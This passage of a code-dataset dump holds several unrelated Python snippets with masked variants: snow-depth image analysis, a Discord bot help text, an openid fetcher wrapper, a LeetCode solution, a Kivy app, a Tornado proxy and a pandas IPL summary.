imageSummary\n", "step-4": "# import necessary modules\nimport cv2\nimport xlsxwriter\nimport statistics\nfrom matplotlib import pyplot as plt\nimport math\nimport tqdm\nimport numpy as np\nimport datetime\n\ndef getDepths(imgs, img_names, intersectionCoords, stakeValidity, templateIntersections,\n upperBorder, tensors, actualTensors, intersectionDist, blobDistTemplate, debug, debug_directory,\n image_dates, imageSummary):\n \"\"\"\n Function to calculate the change in snow depth for each stake using the tensor\n from the specified template\n\n Keyword arguments:\n imgs -- list of input images\n img_names -- list of corresponding image file names\n intersectionCoords -- list containing intersection coordinates for input images\n stakeValidity -- list indicating which stakes in input images are valid\n templateIntersections -- list containing intersection coordinates for template\n upperBorder -- upper crop parameter\n tensors -- tensors from template image\n actualTensors -- tensors calculated for input images\n intersectionDist -- list containing distances from blobs to intersection points\n for input images\n blobDistTemplate -- list containing blob to intersection point distances from\n template\n debug -- bool flag indicating whether output images should be saved\n debug_directory -- directory where output images should be written\n image_dates -- list containing dates of images extracted from EXIF data\n imageSummary -- dictionary containing information about each run\n \"\"\"\n\n # list containing median depths for each image\n median_depths = list()\n median_depths_est = list()\n\n # contains output data for JSON file\n depth_output = {}\n\n # num of images\n num_images = len(imgs)\n\n # create output dictionary for images\n depths = dict()\n\n # create excel workbook and add worksheet\n dest = str(debug_directory) + 'snow-depths.xlsx'\n workbook = xlsxwriter.Workbook(dest)\n worksheet = workbook.add_worksheet()\n worksheet.set_column(0, len(tensors) + 3, 25)\n\n # create format\n cell_format = workbook.add_format()\n cell_format.set_align('center')\n\n # add titles\n worksheet.write(0, 0, \"Image\", cell_format)\n worksheet.write(0, 1, \"Date\", cell_format)\n worksheet.write(0, len(tensors) + 2, \"Median Depth (mm)\", cell_format)\n worksheet.write(0, len(tensors) + 3, \"Median Estimate (mm)\", cell_format)\n for i, j in enumerate(tensors):\n worksheet.write(0, i+2, (\"Stake %s\" % str(i)), cell_format)\n\n # start from the first cell\n row = 1\n col = 0\n\n # image iterator\n iterator = 0\n\n # iterate through images\n for img_ in tqdm.tqdm(imgs):\n # create an image to overlay points on if debugging\n if(debug):\n img_overlay = img_.copy()\n\n # list to hold calculated depths\n depths_stake = list()\n estimate_stake = list()\n\n # get image name\n img_name = img_names[iterator]\n\n # reset column\n col = 0\n\n # write to excel file\n worksheet.write(row, col, img_name, cell_format)\n if isinstance(image_dates[iterator], datetime.datetime):\n worksheet.write(row, col + 1, image_dates[iterator].strftime('%x %X'), cell_format)\n col = 2\n\n # get intersection coordiantes\n coords_stake = intersectionCoords[img_name]\n\n # get blob intersection distances\n intersection_dist_stake = intersectionDist[img_name]\n\n # iterate through stakes in image\n for i, stake in enumerate(coords_stake):\n # if stake is valid and intersection point was found\n if stakeValidity[img_name][i] and stake[\"average\"][1] != False:\n # add reference circles to output image if debugging\n # shows intersection point of image with reference to template\n if(debug):\n cv2.circle(img_overlay, (int(templateIntersections[i][0]), int(templateIntersections[i][1]) - upperBorder), 5, (255,0,0), 3)\n cv2.circle(img_overlay, (int(stake[\"average\"][0]), int(stake[\"average\"][1])), 5, (0,255,0), 2)\n\n # calculate change in snow depth in mm\n tensor = actualTensors[img_name][i] if actualTensors[img_name][i] != True else tensors[i]\n depth_change = ((templateIntersections[i][1] - upperBorder) - stake[\"average\"][1]) * tensor\n\n # calculate change in snow depth using blob distances\n distances_stake = list()\n for w, x in enumerate(intersection_dist_stake[i]):\n if x != False:\n distances_stake.append((abs(blobDistTemplate[i][w]) - abs(x)) * tensor)\n distance_estimate = statistics.median(distances_stake) if len(distances_stake) > 0 else 0\n\n # write to excel file\n worksheet.write(row, col + i, \"%.2f (%.2f)\" % (depth_change, distance_estimate), cell_format)\n\n # add to list\n depths_stake.append(depth_change)\n estimate_stake.append(distance_estimate)\n\n # if stake wasn't valid or intersection point not found\n else:\n # if stake was valid\n if stakeValidity[img_name][i]:\n worksheet.write(row, col + i, \"Not Found\", cell_format)\n # invalid stake\n else:\n worksheet.write(row, col + i, \"Invalid Stake\", cell_format)\n\n # append false to array\n depths_stake.append(False)\n estimate_stake.append(False)\n\n # output debug image\n if(debug):\n cv2.imwrite(debug_directory + img_name, img_overlay)\n\n # add list to dictionary\n depths[img_name] = depths_stake\n\n # determine median depth\n valid_depths = [x for x in depths_stake if x != False]\n valid_estimates = [x for x in estimate_stake if x != False]\n\n if(len(valid_depths) > 0):\n median = statistics.median(valid_depths)\n median_est = statistics.median(valid_estimates)\n else:\n median = False\n median_est = False\n\n # add to median depth list\n median_depths.append(median)\n median_depths_est.append(median_est)\n\n # write median to excel file\n if median != False and median > 0:\n worksheet.write(row, len(tensors) + 2, \"%.2f\" % median, cell_format)\n worksheet.write(row, len(tensors) + 3, \"%.2f\" % median_est, cell_format)\n elif median != False:\n worksheet.write(row, len(tensors) + 2, \"0.0\", cell_format)\n worksheet.write(row, len(tensors) + 3, \"0.0\", cell_format)\n else:\n worksheet.write(row, len(tensors) + 2, \"n/a\", cell_format)\n worksheet.write(row, len(tensors) + 3, \"n/a\", cell_format)\n\n # increment row\n row += 1\n\n # increment iterator\n iterator += 1\n\n # update image summary\n imageSummary[img_name][\" \"] = \"\"\n imageSummary[img_name][\"Stake (Depth Calculation)\"] = \"Depth (mm) Estimate (mm)\"\n for e, depth in enumerate(depths_stake):\n if isinstance(depth, float):\n imageSummary[img_name][\" %d \" % (e+1)] = \"%0.2f %0.2f \" % \\\n (depth, estimate_stake[e])\n else:\n imageSummary[img_name][\" %d \" % (e+1)] = \"%s %s \" % \\\n (\"n/a\", \"n/a\")\n\n # close workbook\n workbook.close()\n\n # remove negative values\n filterSet = zip(median_depths, median_depths_est, image_dates)\n filterSet = [(x, y, z) for x, y, z in filterSet if x != False]\n median_depths, median_depths_est, image_dates = zip(*filterSet)\n median_depths = np.asarray(median_depths).clip(0)\n median_depths_est = np.asarray(median_depths_est).clip(0)\n\n # generate plot\n fig,ax = plt.subplots(1)\n plt.plot(image_dates, median_depths)\n plt.plot(image_dates, median_depths_est)\n plt.gcf().autofmt_xdate()\n plt.legend(['Median Depth', 'Median Estimate'], loc='upper left')\n ax.set_xlabel(\"Date\")\n ax.set_ylabel(\"Snow Depth (mm)\")\n plt.xticks(rotation=75)\n plt.tight_layout()\n\n # save figure\n plt.savefig(debug_directory + \"depth-graph.jpg\")\n plt.close()\n\n # return dictionary containing snow depth changes\n return depths, imageSummary\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
class Helper: def __init__(self): self.commands = ["help", "lottery", "poll", "polling", "prophecy", "roll", "team", "ub"] self.commands_full = ["help [command]", "lottery [seconds]", "poll", "polling [poll number]", "prophecy", "roll [number]", "team [type]", "ub [role]"] self.command_dict = {} self.init_command_info() # noinspection PyMethodMayBeStatic def display_help(self): result = "Help has been requested?\n\n" \ "__**Syntax to Summon Me**__\n" \ "Arise! [command] [options (optional)]\n\n" \ "__**Available Commands**__\n" for com in self.commands_full: result += f"{com}\n" result += "\nIf you want more info on a specific command, " \ "use the command \"help\" followed by a command of your choice. " \ "**For example: Arise! help roll**" \ "\nI'm sure Azir will be glad to help you out... I love him so much..." return result # noinspection PyMethodMayBeStatic def display_command(self, command): if command not in self.commands: return "That command doesn't exist :/" result = f"__**Command: {command[0].upper()}{command[1:]}**__\n\n" result += self.command_dict[command] return result # noinspection PyMethodMayBeStatic def init_command_info(self): self.command_dict["help"] = "Did somebody say recursion?" self.command_dict["lottery"] = "**Syntax:** Arise! lottery [seconds]\n\n" \ "__**Description**__\n" \ "Azir's lottery selects one lucky winner from a pool. To enter the pool, " \ "react to the lottery message with ***any*** emoji. I do not discriminate. " \ "The default timer is **60 seconds**. Upon request, a different number of " \ "seconds may be allowed." self.command_dict["poll"] = "**Syntax:** Arise! poll\n\n" \ "__**Description**__\n" \ "You have questions and I'll help you set them up. Follow the step-by-step " \ "instructions. When you have finished them all, use the polling command to " \ "ask away." self.command_dict["polling"] = "**Syntax:** Arise! polling [poll number]\n\n" \ "__**Description**__\n" \ "This command allows you to use the poll you've created. If you have multiple " \ "polls, you may enter a number to specify which poll. The default is the first." self.command_dict["prophecy"] = "Prepare yourself." self.command_dict["roll"] = "**Syntax:** Arise! roll [number]\n\n" \ "__**Description**__\n" \ "Azir needs random numbers *all* the time so he thought you may need some too. " \ "This command produces a random number from 1 to the default value of **10**. " \ "If you want to roll up to a different number, let me know." self.command_dict["team"] = "**Syntax:** Arise! team [type]\n\n" \ "__**Description**__\n" \ "Do you want to play a team with a theme? The Shuriman Empire has just the " \ "solution for you! With 25 different groupings (wow. Wow! WOW!!), you'll be " \ "having fun forever :) The default value for [type] is **0** in which you'd " \ "get any random team. To select a team based on location, use **1**. To select " \ "a *funner* team, use **2**." self.command_dict["ub"] = "**Syntax:** Arise! ub [role]\n\n" \ "__**Description**__\n" \ "Oh, how I love Ultimate Bravery. No one is as good at this game mode as Azir. " \ "**NO ONE!**... Ahem... So basically, you are given a random champion and a build. " \ "Here are the general guidelines:\n\n" \ "1. Don't play this alone. Azir forbids it.\n" \ "2. No rerolling if the champion or build is undesirable.\n" \ "3. Okay, rerolling is allowed is the majority of the group agrees.\n" \ "4. Feel free to use any rune page. Choose wisely.\n" \ "5.a) Build the items in the order that they've been delivered.\n" \ "5.b) The first two items are interchangeable.\n" \ "6. Try your best to win. That's the whole point of this game.\n\n" \ "The default value for [role] is **1**. To select a jungle specific build, " \ "use **2**. To select a support specific build, use **3**."
normal
{ "blob_id": "fdf76ff20260c25d95a9bf751fa78156071a7825", "index": 7487, "step-1": "class Helper:\n <mask token>\n <mask token>\n\n def display_command(self, command):\n if command not in self.commands:\n return \"That command doesn't exist :/\"\n result = f'__**Command: {command[0].upper()}{command[1:]}**__\\n\\n'\n result += self.command_dict[command]\n return result\n <mask token>\n", "step-2": "class Helper:\n\n def __init__(self):\n self.commands = ['help', 'lottery', 'poll', 'polling', 'prophecy',\n 'roll', 'team', 'ub']\n self.commands_full = ['help [command]', 'lottery [seconds]', 'poll',\n 'polling [poll number]', 'prophecy', 'roll [number]',\n 'team [type]', 'ub [role]']\n self.command_dict = {}\n self.init_command_info()\n <mask token>\n\n def display_command(self, command):\n if command not in self.commands:\n return \"That command doesn't exist :/\"\n result = f'__**Command: {command[0].upper()}{command[1:]}**__\\n\\n'\n result += self.command_dict[command]\n return result\n <mask token>\n", "step-3": "class Helper:\n\n def __init__(self):\n self.commands = ['help', 'lottery', 'poll', 'polling', 'prophecy',\n 'roll', 'team', 'ub']\n self.commands_full = ['help [command]', 'lottery [seconds]', 'poll',\n 'polling [poll number]', 'prophecy', 'roll [number]',\n 'team [type]', 'ub [role]']\n self.command_dict = {}\n self.init_command_info()\n <mask token>\n\n def display_command(self, command):\n if command not in self.commands:\n return \"That command doesn't exist :/\"\n result = f'__**Command: {command[0].upper()}{command[1:]}**__\\n\\n'\n result += self.command_dict[command]\n return result\n\n def init_command_info(self):\n self.command_dict['help'] = 'Did somebody say recursion?'\n self.command_dict['lottery'] = \"\"\"**Syntax:** Arise! lottery [seconds]\n\n__**Description**__\nAzir's lottery selects one lucky winner from a pool. To enter the pool, react to the lottery message with ***any*** emoji. I do not discriminate. The default timer is **60 seconds**. Upon request, a different number of seconds may be allowed.\"\"\"\n self.command_dict['poll'] = \"\"\"**Syntax:** Arise! poll\n\n__**Description**__\nYou have questions and I'll help you set them up. Follow the step-by-step instructions. When you have finished them all, use the polling command to ask away.\"\"\"\n self.command_dict['polling'] = \"\"\"**Syntax:** Arise! polling [poll number]\n\n__**Description**__\nThis command allows you to use the poll you've created. If you have multiple polls, you may enter a number to specify which poll. The default is the first.\"\"\"\n self.command_dict['prophecy'] = 'Prepare yourself.'\n self.command_dict['roll'] = \"\"\"**Syntax:** Arise! roll [number]\n\n__**Description**__\nAzir needs random numbers *all* the time so he thought you may need some too. This command produces a random number from 1 to the default value of **10**. If you want to roll up to a different number, let me know.\"\"\"\n self.command_dict['team'] = \"\"\"**Syntax:** Arise! team [type]\n\n__**Description**__\nDo you want to play a team with a theme? The Shuriman Empire has just the solution for you! With 25 different groupings (wow. Wow! WOW!!), you'll be having fun forever :) The default value for [type] is **0** in which you'd get any random team. To select a team based on location, use **1**. To select a *funner* team, use **2**.\"\"\"\n self.command_dict['ub'] = \"\"\"**Syntax:** Arise! ub [role]\n\n__**Description**__\nOh, how I love Ultimate Bravery. No one is as good at this game mode as Azir. **NO ONE!**... Ahem... So basically, you are given a random champion and a build. Here are the general guidelines:\n\n1. Don't play this alone. Azir forbids it.\n2. No rerolling if the champion or build is undesirable.\n3. Okay, rerolling is allowed is the majority of the group agrees.\n4. Feel free to use any rune page. Choose wisely.\n5.a) Build the items in the order that they've been delivered.\n5.b) The first two items are interchangeable.\n6. Try your best to win. That's the whole point of this game.\n\nThe default value for [role] is **1**. To select a jungle specific build, use **2**. To select a support specific build, use **3**.\"\"\"\n", "step-4": "class Helper:\n\n def __init__(self):\n self.commands = ['help', 'lottery', 'poll', 'polling', 'prophecy',\n 'roll', 'team', 'ub']\n self.commands_full = ['help [command]', 'lottery [seconds]', 'poll',\n 'polling [poll number]', 'prophecy', 'roll [number]',\n 'team [type]', 'ub [role]']\n self.command_dict = {}\n self.init_command_info()\n\n def display_help(self):\n result = \"\"\"Help has been requested?\n\n__**Syntax to Summon Me**__\nArise! [command] [options (optional)]\n\n__**Available Commands**__\n\"\"\"\n for com in self.commands_full:\n result += f'{com}\\n'\n result += \"\"\"\nIf you want more info on a specific command, use the command \"help\" followed by a command of your choice. **For example: Arise! help roll**\nI'm sure Azir will be glad to help you out... I love him so much...\"\"\"\n return result\n\n def display_command(self, command):\n if command not in self.commands:\n return \"That command doesn't exist :/\"\n result = f'__**Command: {command[0].upper()}{command[1:]}**__\\n\\n'\n result += self.command_dict[command]\n return result\n\n def init_command_info(self):\n self.command_dict['help'] = 'Did somebody say recursion?'\n self.command_dict['lottery'] = \"\"\"**Syntax:** Arise! lottery [seconds]\n\n__**Description**__\nAzir's lottery selects one lucky winner from a pool. To enter the pool, react to the lottery message with ***any*** emoji. I do not discriminate. The default timer is **60 seconds**. Upon request, a different number of seconds may be allowed.\"\"\"\n self.command_dict['poll'] = \"\"\"**Syntax:** Arise! poll\n\n__**Description**__\nYou have questions and I'll help you set them up. Follow the step-by-step instructions. When you have finished them all, use the polling command to ask away.\"\"\"\n self.command_dict['polling'] = \"\"\"**Syntax:** Arise! polling [poll number]\n\n__**Description**__\nThis command allows you to use the poll you've created. If you have multiple polls, you may enter a number to specify which poll. The default is the first.\"\"\"\n self.command_dict['prophecy'] = 'Prepare yourself.'\n self.command_dict['roll'] = \"\"\"**Syntax:** Arise! roll [number]\n\n__**Description**__\nAzir needs random numbers *all* the time so he thought you may need some too. This command produces a random number from 1 to the default value of **10**. If you want to roll up to a different number, let me know.\"\"\"\n self.command_dict['team'] = \"\"\"**Syntax:** Arise! team [type]\n\n__**Description**__\nDo you want to play a team with a theme? The Shuriman Empire has just the solution for you! With 25 different groupings (wow. Wow! WOW!!), you'll be having fun forever :) The default value for [type] is **0** in which you'd get any random team. To select a team based on location, use **1**. To select a *funner* team, use **2**.\"\"\"\n self.command_dict['ub'] = \"\"\"**Syntax:** Arise! ub [role]\n\n__**Description**__\nOh, how I love Ultimate Bravery. No one is as good at this game mode as Azir. **NO ONE!**... Ahem... So basically, you are given a random champion and a build. Here are the general guidelines:\n\n1. Don't play this alone. Azir forbids it.\n2. No rerolling if the champion or build is undesirable.\n3. Okay, rerolling is allowed is the majority of the group agrees.\n4. Feel free to use any rune page. Choose wisely.\n5.a) Build the items in the order that they've been delivered.\n5.b) The first two items are interchangeable.\n6. Try your best to win. That's the whole point of this game.\n\nThe default value for [role] is **1**. To select a jungle specific build, use **2**. To select a support specific build, use **3**.\"\"\"\n", "step-5": "class Helper:\r\n def __init__(self):\r\n self.commands = [\"help\",\r\n \"lottery\",\r\n \"poll\",\r\n \"polling\",\r\n \"prophecy\",\r\n \"roll\",\r\n \"team\",\r\n \"ub\"]\r\n self.commands_full = [\"help [command]\",\r\n \"lottery [seconds]\",\r\n \"poll\",\r\n \"polling [poll number]\",\r\n \"prophecy\",\r\n \"roll [number]\",\r\n \"team [type]\",\r\n \"ub [role]\"]\r\n self.command_dict = {}\r\n self.init_command_info()\r\n\r\n # noinspection PyMethodMayBeStatic\r\n def display_help(self):\r\n result = \"Help has been requested?\\n\\n\" \\\r\n \"__**Syntax to Summon Me**__\\n\" \\\r\n \"Arise! [command] [options (optional)]\\n\\n\" \\\r\n \"__**Available Commands**__\\n\"\r\n for com in self.commands_full:\r\n result += f\"{com}\\n\"\r\n\r\n result += \"\\nIf you want more info on a specific command, \" \\\r\n \"use the command \\\"help\\\" followed by a command of your choice. \" \\\r\n \"**For example: Arise! help roll**\" \\\r\n \"\\nI'm sure Azir will be glad to help you out... I love him so much...\"\r\n\r\n return result\r\n\r\n # noinspection PyMethodMayBeStatic\r\n def display_command(self, command):\r\n if command not in self.commands:\r\n return \"That command doesn't exist :/\"\r\n result = f\"__**Command: {command[0].upper()}{command[1:]}**__\\n\\n\"\r\n result += self.command_dict[command]\r\n return result\r\n\r\n # noinspection PyMethodMayBeStatic\r\n def init_command_info(self):\r\n self.command_dict[\"help\"] = \"Did somebody say recursion?\"\r\n self.command_dict[\"lottery\"] = \"**Syntax:** Arise! lottery [seconds]\\n\\n\" \\\r\n \"__**Description**__\\n\" \\\r\n \"Azir's lottery selects one lucky winner from a pool. To enter the pool, \" \\\r\n \"react to the lottery message with ***any*** emoji. I do not discriminate. \" \\\r\n \"The default timer is **60 seconds**. Upon request, a different number of \" \\\r\n \"seconds may be allowed.\"\r\n self.command_dict[\"poll\"] = \"**Syntax:** Arise! poll\\n\\n\" \\\r\n \"__**Description**__\\n\" \\\r\n \"You have questions and I'll help you set them up. Follow the step-by-step \" \\\r\n \"instructions. When you have finished them all, use the polling command to \" \\\r\n \"ask away.\"\r\n self.command_dict[\"polling\"] = \"**Syntax:** Arise! polling [poll number]\\n\\n\" \\\r\n \"__**Description**__\\n\" \\\r\n \"This command allows you to use the poll you've created. If you have multiple \" \\\r\n \"polls, you may enter a number to specify which poll. The default is the first.\"\r\n self.command_dict[\"prophecy\"] = \"Prepare yourself.\"\r\n self.command_dict[\"roll\"] = \"**Syntax:** Arise! roll [number]\\n\\n\" \\\r\n \"__**Description**__\\n\" \\\r\n \"Azir needs random numbers *all* the time so he thought you may need some too. \" \\\r\n \"This command produces a random number from 1 to the default value of **10**. \" \\\r\n \"If you want to roll up to a different number, let me know.\"\r\n self.command_dict[\"team\"] = \"**Syntax:** Arise! team [type]\\n\\n\" \\\r\n \"__**Description**__\\n\" \\\r\n \"Do you want to play a team with a theme? The Shuriman Empire has just the \" \\\r\n \"solution for you! With 25 different groupings (wow. Wow! WOW!!), you'll be \" \\\r\n \"having fun forever :) The default value for [type] is **0** in which you'd \" \\\r\n \"get any random team. To select a team based on location, use **1**. To select \" \\\r\n \"a *funner* team, use **2**.\"\r\n self.command_dict[\"ub\"] = \"**Syntax:** Arise! ub [role]\\n\\n\" \\\r\n \"__**Description**__\\n\" \\\r\n \"Oh, how I love Ultimate Bravery. No one is as good at this game mode as Azir. \" \\\r\n \"**NO ONE!**... Ahem... So basically, you are given a random champion and a build. \" \\\r\n \"Here are the general guidelines:\\n\\n\" \\\r\n \"1. Don't play this alone. Azir forbids it.\\n\" \\\r\n \"2. No rerolling if the champion or build is undesirable.\\n\" \\\r\n \"3. Okay, rerolling is allowed is the majority of the group agrees.\\n\" \\\r\n \"4. Feel free to use any rune page. Choose wisely.\\n\" \\\r\n \"5.a) Build the items in the order that they've been delivered.\\n\" \\\r\n \"5.b) The first two items are interchangeable.\\n\" \\\r\n \"6. Try your best to win. That's the whole point of this game.\\n\\n\" \\\r\n \"The default value for [role] is **1**. To select a jungle specific build, \" \\\r\n \"use **2**. To select a support specific build, use **3**.\"\r\n", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
""" An wrapper around openid's fetcher to be used in django. """ from openid import fetchers class UrlfetchFetcher(fetchers.HTTPFetcher): def fetch(self, url, body=None, headers=None): return fetchers.fetch(body, headers)
normal
{ "blob_id": "14e247b7b586242bfc17507fece3c60b7b8a3025", "index": 9604, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass UrlfetchFetcher(fetchers.HTTPFetcher):\n <mask token>\n", "step-3": "<mask token>\n\n\nclass UrlfetchFetcher(fetchers.HTTPFetcher):\n\n def fetch(self, url, body=None, headers=None):\n return fetchers.fetch(body, headers)\n", "step-4": "<mask token>\nfrom openid import fetchers\n\n\nclass UrlfetchFetcher(fetchers.HTTPFetcher):\n\n def fetch(self, url, body=None, headers=None):\n return fetchers.fetch(body, headers)\n", "step-5": "\n\"\"\"\nAn wrapper around openid's fetcher to be used in django.\n\"\"\"\n\nfrom openid import fetchers\n\nclass UrlfetchFetcher(fetchers.HTTPFetcher):\n def fetch(self, url, body=None, headers=None):\n return fetchers.fetch(body, headers)\n\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
# # @lc app=leetcode id=14 lang=python3 # # [14] Longest Common Prefix # # https://leetcode.com/problems/longest-common-prefix/description/ # # algorithms # Easy (34.95%) # Likes: 2372 # Dislikes: 1797 # Total Accepted: 718.5K # Total Submissions: 2M # Testcase Example: '["flower","flow","flight"]' # # Write a function to find the longest common prefix string amongst an array of # strings. # # If there is no common prefix, return an empty string "". # # Example 1: # # # Input: ["flower","flow","flight"] # Output: "fl" # # # Example 2: # # # Input: ["dog","racecar","car"] # Output: "" # Explanation: There is no common prefix among the input strings. # # # Note: # # All given inputs are in lowercase letters a-z. # # # @lc code=start class Solution: def longestCommonPrefix(self, strs: [str]) -> str: if not strs: return '' strs.sort(key=len) res = strs[0] while len(res) > 0: found = False for s in strs[1:]: if res != s[:len(res)]: res = res[:-1] found = True break if found: continue return res return res # @lc code=end if __name__ == '__main__': s = Solution() s.longestCommonPrefix(["ca","a"]) s.longestCommonPrefix(["dog","racecar","car"]) s.longestCommonPrefix(["flower","flow","flight"])
normal
{ "blob_id": "80be5f49a179eebc4915bf734a8e362cc2f2ef7c", "index": 3213, "step-1": "<mask token>\n", "step-2": "class Solution:\n <mask token>\n\n\n<mask token>\n", "step-3": "class Solution:\n\n def longestCommonPrefix(self, strs: [str]) ->str:\n if not strs:\n return ''\n strs.sort(key=len)\n res = strs[0]\n while len(res) > 0:\n found = False\n for s in strs[1:]:\n if res != s[:len(res)]:\n res = res[:-1]\n found = True\n break\n if found:\n continue\n return res\n return res\n\n\n<mask token>\n", "step-4": "class Solution:\n\n def longestCommonPrefix(self, strs: [str]) ->str:\n if not strs:\n return ''\n strs.sort(key=len)\n res = strs[0]\n while len(res) > 0:\n found = False\n for s in strs[1:]:\n if res != s[:len(res)]:\n res = res[:-1]\n found = True\n break\n if found:\n continue\n return res\n return res\n\n\nif __name__ == '__main__':\n s = Solution()\n s.longestCommonPrefix(['ca', 'a'])\n s.longestCommonPrefix(['dog', 'racecar', 'car'])\n s.longestCommonPrefix(['flower', 'flow', 'flight'])\n", "step-5": "#\n# @lc app=leetcode id=14 lang=python3\n#\n# [14] Longest Common Prefix\n#\n# https://leetcode.com/problems/longest-common-prefix/description/\n#\n# algorithms\n# Easy (34.95%)\n# Likes: 2372\n# Dislikes: 1797\n# Total Accepted: 718.5K\n# Total Submissions: 2M\n# Testcase Example: '[\"flower\",\"flow\",\"flight\"]'\n#\n# Write a function to find the longest common prefix string amongst an array of\n# strings.\n# \n# If there is no common prefix, return an empty string \"\".\n# \n# Example 1:\n# \n# \n# Input: [\"flower\",\"flow\",\"flight\"]\n# Output: \"fl\"\n# \n# \n# Example 2:\n# \n# \n# Input: [\"dog\",\"racecar\",\"car\"]\n# Output: \"\"\n# Explanation: There is no common prefix among the input strings.\n# \n# \n# Note:\n# \n# All given inputs are in lowercase letters a-z.\n# \n#\n\n# @lc code=start\nclass Solution:\n def longestCommonPrefix(self, strs: [str]) -> str:\n if not strs:\n return ''\n strs.sort(key=len)\n res = strs[0]\n while len(res) > 0:\n found = False\n for s in strs[1:]: \n if res != s[:len(res)]:\n res = res[:-1]\n found = True\n break\n if found:\n continue\n return res\n return res\n# @lc code=end\nif __name__ == '__main__':\n s = Solution()\n s.longestCommonPrefix([\"ca\",\"a\"])\n s.longestCommonPrefix([\"dog\",\"racecar\",\"car\"])\n s.longestCommonPrefix([\"flower\",\"flow\",\"flight\"])\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
from kivy.app import App from kivy.uix.floatlayout import FloatLayout class LayoutWindow(FloatLayout): pass class floatlayoutApp(App): def build(self): return LayoutWindow() if __name__== "__main__": display = floatlayoutApp() display.run()
normal
{ "blob_id": "2af8677e76b77b9bfa579012a85ea331c0c7f390", "index": 136, "step-1": "<mask token>\n\n\nclass floatlayoutApp(App):\n\n def build(self):\n return LayoutWindow()\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass LayoutWindow(FloatLayout):\n pass\n\n\nclass floatlayoutApp(App):\n\n def build(self):\n return LayoutWindow()\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass LayoutWindow(FloatLayout):\n pass\n\n\nclass floatlayoutApp(App):\n\n def build(self):\n return LayoutWindow()\n\n\nif __name__ == '__main__':\n display = floatlayoutApp()\n display.run()\n", "step-4": "from kivy.app import App\nfrom kivy.uix.floatlayout import FloatLayout\n\n\nclass LayoutWindow(FloatLayout):\n pass\n\n\nclass floatlayoutApp(App):\n\n def build(self):\n return LayoutWindow()\n\n\nif __name__ == '__main__':\n display = floatlayoutApp()\n display.run()\n", "step-5": "from kivy.app import App\nfrom kivy.uix.floatlayout import FloatLayout\n\n\nclass LayoutWindow(FloatLayout):\n pass\n\n\nclass floatlayoutApp(App):\n def build(self):\n return LayoutWindow()\n\n\nif __name__== \"__main__\":\n display = floatlayoutApp()\n display.run()", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
import tornado import copy class DjangoHandler(tornado.web.RequestHandler): async def reroute(self): http = tornado.httpclient.AsyncHTTPClient() new_request = copy.deepcopy(self.request) url_obj = copy.urlparse(new_request.url) new_request.url = f"{url_obj.scheme}://localhost:9000{url_obj.path}" return await http.fetch(new_request) get = reroute post = reroute application = tornado.web.Application([ # (r'/chat', WebsocketChatHandler), (r'/', DjangoHandler), ]) application.listen(80) tornado.ioloop.IOLoop.current().start()
normal
{ "blob_id": "6960fc6d949512ffc783b085041f86cb791160a3", "index": 1500, "step-1": "<mask token>\n\n\nclass DjangoHandler(tornado.web.RequestHandler):\n\n async def reroute(self):\n http = tornado.httpclient.AsyncHTTPClient()\n new_request = copy.deepcopy(self.request)\n url_obj = copy.urlparse(new_request.url)\n new_request.url = f'{url_obj.scheme}://localhost:9000{url_obj.path}'\n return await http.fetch(new_request)\n <mask token>\n <mask token>\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass DjangoHandler(tornado.web.RequestHandler):\n\n async def reroute(self):\n http = tornado.httpclient.AsyncHTTPClient()\n new_request = copy.deepcopy(self.request)\n url_obj = copy.urlparse(new_request.url)\n new_request.url = f'{url_obj.scheme}://localhost:9000{url_obj.path}'\n return await http.fetch(new_request)\n get = reroute\n post = reroute\n\n\n<mask token>\napplication.listen(80)\ntornado.ioloop.IOLoop.current().start()\n", "step-3": "<mask token>\n\n\nclass DjangoHandler(tornado.web.RequestHandler):\n\n async def reroute(self):\n http = tornado.httpclient.AsyncHTTPClient()\n new_request = copy.deepcopy(self.request)\n url_obj = copy.urlparse(new_request.url)\n new_request.url = f'{url_obj.scheme}://localhost:9000{url_obj.path}'\n return await http.fetch(new_request)\n get = reroute\n post = reroute\n\n\napplication = tornado.web.Application([('/', DjangoHandler)])\napplication.listen(80)\ntornado.ioloop.IOLoop.current().start()\n", "step-4": "import tornado\nimport copy\n\n\nclass DjangoHandler(tornado.web.RequestHandler):\n\n async def reroute(self):\n http = tornado.httpclient.AsyncHTTPClient()\n new_request = copy.deepcopy(self.request)\n url_obj = copy.urlparse(new_request.url)\n new_request.url = f'{url_obj.scheme}://localhost:9000{url_obj.path}'\n return await http.fetch(new_request)\n get = reroute\n post = reroute\n\n\napplication = tornado.web.Application([('/', DjangoHandler)])\napplication.listen(80)\ntornado.ioloop.IOLoop.current().start()\n", "step-5": "import tornado\nimport copy\n\n\nclass DjangoHandler(tornado.web.RequestHandler):\n async def reroute(self):\n http = tornado.httpclient.AsyncHTTPClient()\n\n new_request = copy.deepcopy(self.request)\n url_obj = copy.urlparse(new_request.url)\n new_request.url = f\"{url_obj.scheme}://localhost:9000{url_obj.path}\"\n\n return await http.fetch(new_request)\n\n get = reroute\n post = reroute\n\n\napplication = tornado.web.Application([\n # (r'/chat', WebsocketChatHandler),\n (r'/', DjangoHandler),\n])\napplication.listen(80)\n\ntornado.ioloop.IOLoop.current().start()\n", "step-ids": [ 1, 3, 4, 5, 6 ] }
[ 1, 3, 4, 5, 6 ]
import pandas as pd from greyatomlib.pandas_project.q01_read_csv_data_to_df.build import read_csv_data_to_df def get_runs_counts_by_match(): ipl_df = read_csv_data_to_df("data/ipl_dataset.csv") df1 = pd.DataFrame(ipl_df[['match_code','runs','venue']]) df2 = df1.groupby(['match_code','runs'], as_index=False).count() df = df2.pivot(index='match_code',columns='runs') df = df.fillna(0) df = df.astype('int') return df get_runs_counts_by_match()
normal
